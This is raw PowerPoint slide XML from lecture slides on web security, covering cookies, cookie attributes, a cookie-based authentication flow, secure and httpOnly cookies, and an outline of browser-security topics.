            <a:fld id="{21B46397-9ABA-41D2-BBEA-0C987D291BDA}" type="slidenum">
              <a:rPr lang="en-GB"/>
              <a:pPr/>
              <a:t>65</a:t>
            </a:fld>
            <a:endParaRPr lang="en-GB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186" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="304800" y="12954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Cookies</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="137318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01000" cy="5257800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Used to store state on user’s machine</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1373189" name="Rectangle 5"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1447800" y="19970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0" name="AutoShape 6"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1547813" y="20970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191" name="AutoShape 7"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1066800" y="28352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2" name="Rectangle 8"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1066800" y="30638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193" name="Freeform 9"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2190750" y="28305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4" name="AutoShape 10"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6172200" y="19208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195" name="Line 11"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2590800" y="23780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6" name="Text Box 12"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3626778" y="1905000"/>
            <a:ext cx="1088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</p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1373197" name="Line 13"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2590800" y="26066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198" name="Text Box 14"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2819400" y="2667000"/>
            <a:ext cx="48006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domain = (who can read)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expires = (when expires)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 = (only over SSL)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1373199" name="Rectangle 15"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1447800" y="5029200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0" name="AutoShape 16"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1547813" y="5129213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73201" name="AutoShape 17"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1066800" y="5867400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2" name="Rectangle 18"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1066800" y="6096000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3203" name="Freeform 19"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2190750" y="5862638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4" name="AutoShape 20"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6172200" y="4953000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73205" name="Line 21"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2590800" y="528002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73206" name="Text Box 22"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2895600" y="5334000"/>
            <a:ext cx="2924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 smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="808000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>POST  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="808000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>…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rgbClr val="808000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Cookie:  NAME = VALUE</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1373207" name="Text Box 23"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3521075" y="6407150"/>
            <a:ext cx="5194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kumimoji="1" lang="en-US"/>
              <a:t>HTTP is stateless protocol; cookies add state</a:t>
            </a:r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1373208" name="Line 24"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="457200" y="4724400"/>
            <a:ext cx="807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130300" y="3657600"/>
            <a:ext cx="2984500" cy="714375"/>
            <a:chOff x="712" y="2304"/>
            <a:chExt cx="1880" cy="450"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1373210" name="Text Box 26"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="712" y="2304"/>
              <a:ext cx="1331" cy="450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expires=NULL:</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:r>
                <a:rPr lang="en-US"/>
                <a:t>this session only</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1373211" name="Line 27"/>
            <p:cNvSpPr>
              <a:spLocks noChangeShapeType="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2016" y="2496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3199" grpId="0" animBg="1"/>
      <p:bldP spid="1373200" grpId="0" animBg="1"/>
      <p:bldP spid="1373201" grpId="0" animBg="1"/>
      <p:bldP spid="1373202" grpId="0" animBg="1"/>
      <p:bldP spid="1373203" grpId="0" animBg="1"/>
      <p:bldP spid="1373204" grpId="0" animBg="1"/>
      <p:bldP spid="1373205" grpId="0" animBg="1"/>
      <p:bldP spid="1373206" grpId="0"/>
      <p:bldP spid="1373207" grpId="0"/>
      <p:bldP spid="137320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9" name="Rectangle 11"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="84582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6" name="Rectangle 8"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="381000" y="1143000"/>
            <a:ext cx="533400" cy="9906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authentication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810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3" name="Rectangle 5"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4267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23014" name="Rectangle 6"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7696200" y="2133600"/>
            <a:ext cx="1219200" cy="4343400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent1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323015" name="Text Box 7"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="457200" y="1736725"/>
            <a:ext cx="1090613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Browser</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1323017" name="Text Box 9"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4154488" y="1752600"/>
            <a:ext cx="1484312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Web Server</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1323018" name="Text Box 10"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7593013" y="1752600"/>
            <a:ext cx="1474787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/>
              <a:t>Auth server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1600200" y="2222500"/>
            <a:ext cx="2667000" cy="701675"/>
            <a:chOff x="1008" y="1400"/>
            <a:chExt cx="1680" cy="442"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1323020" name="Line 12"/>
            <p:cNvSpPr>
              <a:spLocks noChangeShapeType="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm flipV="1">
              <a:off x="1008" y="1632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1" name="Text Box 13"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="1164" y="1400"/>
              <a:ext cx="1328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POST login.cgi</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:r>
                <a:rPr lang="en-US"/>
                <a:t>Username &amp; pwd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486400" y="2527300"/>
            <a:ext cx="2106613" cy="396875"/>
            <a:chOff x="3456" y="1592"/>
            <a:chExt cx="1327" cy="250"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1323022" name="Line 14"/>
            <p:cNvSpPr>
              <a:spLocks noChangeShapeType="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3456" y="1842"/>
              <a:ext cx="132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3" name="Text Box 15"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3552" y="1592"/>
              <a:ext cx="1031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Validate user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5486400" y="3260725"/>
            <a:ext cx="3429000" cy="717550"/>
            <a:chOff x="3456" y="2054"/>
            <a:chExt cx="2160" cy="452"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="5" name="Group 34"/>
            <p:cNvGrpSpPr>
              <a:grpSpLocks/>
            </p:cNvGrpSpPr>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr bwMode="auto">
            <a:xfrm>
              <a:off x="3456" y="2054"/>
              <a:ext cx="1392" cy="250"/>
              <a:chOff x="3456" y="2054"/>
              <a:chExt cx="1392" cy="250"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="1323024" name="Line 16"/>
              <p:cNvSpPr>
                <a:spLocks noChangeShapeType="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm flipH="1">
                <a:off x="3456" y="2256"/>
                <a:ext cx="139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323025" name="Text Box 17"/>
              <p:cNvSpPr txBox="1">
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="3763" y="2054"/>
                <a:ext cx="850" cy="250"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
              <a:noFill/>
              <a:ln w="12700" algn="ctr">
                <a:noFill/>
                <a:miter lim="800000"/>
                <a:headEnd/>
                <a:tailEnd type="none" w="lg" len="med"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009900"/>
                    </a:solidFill>
                  </a:rPr>
                  <a:t>auth=val</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
        </p:grpSp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1323027" name="Text Box 19"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="4877" y="2256"/>
              <a:ext cx="739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tx2"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>Store val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1600200" y="3336925"/>
            <a:ext cx="2709863" cy="396875"/>
            <a:chOff x="1008" y="2102"/>
            <a:chExt cx="1707" cy="250"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1323028" name="Line 20"/>
            <p:cNvSpPr>
              <a:spLocks noChangeShapeType="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm flipH="1">
              <a:off x="1008" y="2304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29" name="Text Box 21"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="1098" y="2102"/>
              <a:ext cx="1617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Set-cookie: </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1800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sp>
        <p:nvSpPr>
          <p:cNvPr id="1323030" name="Line 22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none" w="lg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1600200" y="4403725"/>
            <a:ext cx="2667000" cy="701675"/>
            <a:chOff x="1008" y="2774"/>
            <a:chExt cx="1680" cy="442"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1323031" name="Line 23"/>
            <p:cNvSpPr>
              <a:spLocks noChangeShapeType="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="1008" y="2976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2" name="Text Box 24"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="1064" y="2774"/>
              <a:ext cx="148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GET restricted.html</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:r>
                <a:rPr lang="en-US"/>
                <a:t>Cookie:  </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" b="1">
                  <a:solidFill>
                    <a:srgbClr val="009900"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>auth=val</a:t>
              </a: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486400" y="4602163"/>
            <a:ext cx="2209800" cy="701675"/>
            <a:chOff x="3456" y="2899"/>
            <a:chExt cx="1392" cy="442"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1323033" name="Line 25"/>
            <p:cNvSpPr>
              <a:spLocks noChangeShapeType="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3456" y="3120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4" name="Text Box 26"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3552" y="2899"/>
              <a:ext cx="11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restricted.html</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:r>
                <a:rPr lang="en-US"/>
                <a:t>auth=val</a:t>
              </a:r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486400" y="5562600"/>
            <a:ext cx="2209800" cy="396875"/>
            <a:chOff x="3456" y="3504"/>
            <a:chExt cx="1392" cy="250"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1323035" name="Line 27"/>
            <p:cNvSpPr>
              <a:spLocks noChangeShapeType="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm flipH="1">
              <a:off x="3456" y="3552"/>
              <a:ext cx="13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6" name="Text Box 28"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3832" y="3504"/>
              <a:ext cx="668" cy="250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YES/NO</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="10" name="Group 37"/>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="1689100" y="5562600"/>
            <a:ext cx="2465388" cy="701675"/>
            <a:chOff x="1064" y="3504"/>
            <a:chExt cx="1553" cy="442"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1323037" name="Line 29"/>
            <p:cNvSpPr>
              <a:spLocks noChangeShapeType="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm flipH="1">
              <a:off x="1064" y="3744"/>
              <a:ext cx="15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23038" name="Text Box 30"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="1098" y="3504"/>
              <a:ext cx="1440" cy="442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 type="none" w="lg" len="med"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If YES,  </a:t>
              </a:r>
              <a:br>
                <a:rPr lang="en-US"/>
              </a:br>
              <a:r>
                <a:rPr lang="en-US"/>
                <a:t>      restricted.html</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1323048" name="Text Box 40"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7661275" y="4876800"/>
            <a:ext cx="1254125" cy="39687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tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Check val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3048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Cookie Security Policy</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13742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305800" cy="5257800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Uses:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>User authentication</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Personalization</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>User tracking:   e.g.  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Doubleclick</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>   (3</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="30000" dirty="0"/>
              <a:t>rd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> party cookies)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Browser will store:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>At most  20 cookies/site,     3 KB / cookie</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Origin is the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>tuple</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&lt;domain, path&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Can set cookies valid across a domain suffix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	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6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Secure Cookies</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1423364" name="Rectangle 4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5" name="AutoShape 5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423366" name="AutoShape 6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7" name="Rectangle 7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23368" name="Freeform 8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69" name="AutoShape 9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423370" name="Line 10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1" name="Text Box 11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423372" name="Line 12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423373" name="Text Box 13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Secure=true</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1423374" name="Text Box 14"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="838200" y="3765550"/>
            <a:ext cx="7772400" cy="2574925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400"/>
              <a:t>  Provides confidentiality against network attacker</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFontTx/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400"/>
              <a:t>  Browser will only send cookie back over HTTPS</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPct val="80000"/>
              </a:spcBef>
              <a:buFontTx/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400"/>
              <a:t>  … but no integrity</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" b="1">
              <a:solidFill>
                <a:srgbClr val="FF00FF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFontTx/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400"/>
              <a:t>  Can rewrite secure cookies over HTTP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network attacker can rewrite secure cookies</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2">
              <a:buFont typeface="Symbol" pitchFamily="18" charset="2"/>
              <a:buChar char="Þ"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:sym typeface="Symbol" pitchFamily="18" charset="2"/>
              </a:rPr>
              <a:t> can log user into attacker’s account</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2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 lectures on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Browser security model</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>The browser as an OS and execution platform</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>Protocols, isolation, communication, …</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>Web application security</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>Application pitfalls and defenses</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>Content security policies</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>Additional mechanisms for sandboxing and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>security</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>Authentication and session management</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>How users authenticate to web sites</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>Browser-server mechanisms for managing </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>state</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>HTTPS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>: goals and pitfalls</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>Network issues and browser protocol </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>handling</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"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This two-week section could fill an entire course</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
            </a:endParaRP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538" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="304800" y="990600"/>
            <a:ext cx="2157413" cy="533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httpOnly Cookies</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1345541" name="Rectangle 5"/>
          <p:cNvSpPr>
